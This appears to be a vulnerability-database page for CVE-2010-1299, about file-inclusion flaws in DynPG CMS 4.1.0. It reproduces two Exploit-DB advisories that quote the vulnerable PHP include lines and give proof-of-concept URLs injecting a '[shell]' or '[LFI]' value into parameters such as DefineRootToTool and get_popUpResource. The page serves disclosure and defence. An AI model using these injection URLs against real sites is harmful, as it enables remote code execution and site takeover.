VIR Vulnerability Intelligence Relay

CVE-2010-1299

medium
Published 2010-04-07 ยท Modified 2026-04-29
๐Ÿ’ฌ Discuss on Community โœš Propose mitigation
CVSS v3
โ€”
CVSS v4 NEW
โ€”
not yet in upstream
VIR risk
6.1

Description

Multiple PHP remote file inclusion vulnerabilities in DynPG CMS 4.1.0, and possibly earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the (1) DefineRootToTool parameter to counter.php, (2) PathToRoot parameter to plugins/DPGguestbook/guestbookaction.php and (3) get_popUpResource parameter to backendpopup/popup.php. NOTE: some of these details are obtained from third party information.

Predictions

Exploit likelihood
20%
Patch ETA
โ€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ€” if you've already worked around this in production โ€” publish your fix to the community-verified tier.

โœš Propose a mitigation on Community โ†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-12018 webapps php text ยท 4 KB
eidelweiss ยท 2010-04-02

DynPG CMS 4.1.0 - 'popup.php' / 'counter.php' Multiple Vulnerabilities

text exploit Source: Exploit-DB 
########################################################
	DynPG CMS v4.1.0 Multiple Vulnerability
########################################################
 
    fucking the Web Apps [attack edition]
 
 ____                  __                              __    __               
/\  _`\               /\ \      __                    /\ \__/\ \              
\ \ \L\_\__  __    ___\ \ \/'\ /\_\    ___      __    \ \ ,_\ \ \___      __  
 \ \  _\/\ \/\ \  /'___\ \ , < \/\ \ /' _ `\  /'_ `\   \ \ \/\ \  _ `\  /'__`\
  \ \ \/\ \ \_\ \/\ \__/\ \ \\`\\ \ \/\ \/\ \/\ \L\ \   \ \ \_\ \ \ \ \/\  __/
   \ \_\ \ \____/\ \____\\ \_\ \_\ \_\ \_\ \_\ \____ \   \ \__\\ \_\ \_\ \____\
    \/_/  \/___/  \/____/ \/_/\/_/\/_/\/_/\/_/\/___L\ \   \/__/ \/_/\/_/\/____/
                                                /\____/                       
                                                \_/__/                        
 __      __          __          ______                       Hack0wn! Security Project    
/\ \  __/\ \        /\ \        /\  _  \                          
\ \ \/\ \ \ \     __\ \ \____   \ \ \L\ \  _____   _____     ____ 
 \ \ \ \ \ \ \  /'__`\ \ '__`\   \ \  __ \/\ '__`\/\ '__`\  /',__\
  \ \ \_/ \_\ \/\  __/\ \ \L\ \   \ \ \/\ \ \ \L\ \ \ \L\ \/\__, `\
   \ `\___x___/\ \____\\ \_,__/    \ \_\ \_\ \ ,__/\ \ ,__/\/\____/
    '\/__//__/  \/____/ \/___/      \/_/\/_/\ \ \/  \ \ \/  \/___/
                                             \ \_\   \ \_\        
                                              \/_/    \/_/         


[+]Title : 	DynPG CMS v4.1.0 Multiple Vulnerability
[+]Version: 	4.1.0 (Other or lower versions may also be affected)
[+]Download: 	http://www.dynpg.org/download_en.php
[+]License: 	GNU / GPL
[+]Metode : 	Multiple
[+]Author: 	eidelweiss
[!]Work If: 	register_globals = On
		magic_quotes = Off

[*]Special to Syabilla_putri (I miss u so much to)[*]

[!]Thank`s Fly To:

[~] Jose Luis Gongora Fernandez a.k.a JosS - sp3x (securityreason)
[~] exploit-db team (loneferret - Exploits - dookie2000ca)
[~] Inj3ct0r.com r0073r & 0x1D [Inj3ct0r Exploit Database], [D]eal [C]yber

########################################################

Description:

DynPG is used to upload and manage dynamic web content similar to other content management systems.
DynPG however differs from other CMS, because it is embedded directly into websites.
The software was originally developed to realize designs that are created with Adobe Photoshop, Adobe Fireworks, Adobe Illustrator or any other graphics software.
The layout is created with an editor like Adobe Dreamweaver or Adobe GoLive or even as simple code.
After that, code snippets are placed at those points, where dynamically generated content (like articles, galleries, blogs or other dynamic content) shall be generated.
It provides a convenient way to extend existing websites with dynamic content. DynPG provides a template engine, but also supports existing CSS layouts.

########################################################

	-=[ Vuln C0de ]=-

[!] counter.php

		require_once $GLOBALS["DefineRootToTool"]."config.php";	// line 15
		require_once $GLOBALS["DefineRootToTool"]."connectdb.php";	// line 16


[!] /plugins/DPGguestbook/guestbookaction.php

<?php
    function dynPG_Guestbook_proceedREQ()
    {
      require_once $GLOBALS['DynPG']->PathToRoot .'config.php';
      require_once $GLOBALS['DynPG']->PathToRoot .'defines.php';
      require_once $GLOBALS['DynPG']->PathToRoot .'connectdb.php';


[!] /backendpopup/popup.php

	require './resources/' . $get_popUpResource . '/index.res.php';	// line 36

[!] etc , etc , etc


	-=[ Proof Of Concept ]=-
	
	http://127.0.0.1/dynpg_path/counter.php?inc=whtever&DefineRootToTool=[shell] <-- RFI

	http://127.0.0.1/dynpg_path/backendpopup/popup.php?popUpResource=[LFI]%00

	etc , etc , etc
	
######################=[E0F]=#############################
EDB-11994 webapps php text ยท 4 KB
eidelweiss ยท 2010-04-01

DynPG CMS 4.1.0 - Multiple Vulnerabilities

text exploit Source: Exploit-DB 
########################################################
	DynPG CMS v4.1.0 Multiple Vulnerability
########################################################
 
    fucking the Web Apps [attack edition]
 
 ____                  __                              __    __               
/\  _`\               /\ \      __                    /\ \__/\ \              
\ \ \L\_\__  __    ___\ \ \/'\ /\_\    ___      __    \ \ ,_\ \ \___      __  
 \ \  _\/\ \/\ \  /'___\ \ , < \/\ \ /' _ `\  /'_ `\   \ \ \/\ \  _ `\  /'__`\
  \ \ \/\ \ \_\ \/\ \__/\ \ \\`\\ \ \/\ \/\ \/\ \L\ \   \ \ \_\ \ \ \ \/\  __/
   \ \_\ \ \____/\ \____\\ \_\ \_\ \_\ \_\ \_\ \____ \   \ \__\\ \_\ \_\ \____\
    \/_/  \/___/  \/____/ \/_/\/_/\/_/\/_/\/_/\/___L\ \   \/__/ \/_/\/_/\/____/
                                                /\____/                       
                                                \_/__/                        
 __      __          __          ______                       Hack0wn! Security Project    
/\ \  __/\ \        /\ \        /\  _  \                          
\ \ \/\ \ \ \     __\ \ \____   \ \ \L\ \  _____   _____     ____ 
 \ \ \ \ \ \ \  /'__`\ \ '__`\   \ \  __ \/\ '__`\/\ '__`\  /',__\
  \ \ \_/ \_\ \/\  __/\ \ \L\ \   \ \ \/\ \ \ \L\ \ \ \L\ \/\__, `\
   \ `\___x___/\ \____\\ \_,__/    \ \_\ \_\ \ ,__/\ \ ,__/\/\____/
    '\/__//__/  \/____/ \/___/      \/_/\/_/\ \ \/  \ \ \/  \/___/
                                             \ \_\   \ \_\        
                                              \/_/    \/_/         


[+]Title	:	DynPG CMS v4.1.0 Multiple Vulnerability
[+]Version:	4.1.0 (Other or lower versions may also be affected)
[+]Download:	http://www.dynpg.org/download_en.php
[+]License:	GNU / GPL
[+]Metode :	Remote File Inclusion
[+]Author:	eidelweiss

	[*]Special to Syabilla_putri (I miss u so much to)[*]

	[!]Thank`s Fly To:

[~] Jose Luis Gongora Fernandez a.k.a JosS
[~] exploit-db team
[~] Inj3ct0r.com r0073r & 0x1D [Inj3ct0r Exploit Database], [D]eal [C]yber

########################################################

Description:

DynPG is used to upload and manage dynamic web content similar to other content management systems.
DynPG however differs from other CMS, because it is embedded directly into websites.
The software was originally developed to realize designs that are created with Adobe Photoshop, Adobe Fireworks, Adobe Illustrator or any other graphics software.
The layout is created with an editor like Adobe Dreamweaver or Adobe GoLive or even as simple code.
After that, code snippets are placed at those points, where dynamically generated content (like articles, galleries, blogs or other dynamic content) shall be generated.
It provides a convenient way to extend existing websites with dynamic content. DynPG provides a template engine, but also supports existing CSS layouts.

########################################################

	-=[ Vuln C0de ]=-

[!] counter.php

		require_once $GLOBALS["DefineRootToTool"]."config.php";	// line 15
		require_once $GLOBALS["DefineRootToTool"]."connectdb.php";	// line 16


[!] /plugins/DPGguestbook/guestbookaction.php

<?php
    function dynPG_Guestbook_proceedREQ()
    {
      require_once $GLOBALS['DynPG']->PathToRoot .'config.php';
      require_once $GLOBALS['DynPG']->PathToRoot .'defines.php';
      require_once $GLOBALS['DynPG']->PathToRoot .'connectdb.php';


[!] /backendpopup/popup.php

	require './resources/' . $get_popUpResource . '/index.res.php';	// line 36

[!] etc , etc , etc


	-=[ Proof Of Concept ]=-
	
	http://127.0.0.1/DynPG_path/plugins/DPGguestbook/guestbookaction.php?PathToRoot= [LFI]

	http://127.0.0.1/DynPG_path/backendpopup/popup.php?get_popUpResource= [inj3ct0r sh3ll] <-- RFI

	etc , etc , etc
	
######################=[E0F]=#############################

Application impact
VendorProductVersionsFixed
dynpgdynpg{"endIncluding":"4.1.0"}

References

CWEs

CWE-94

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.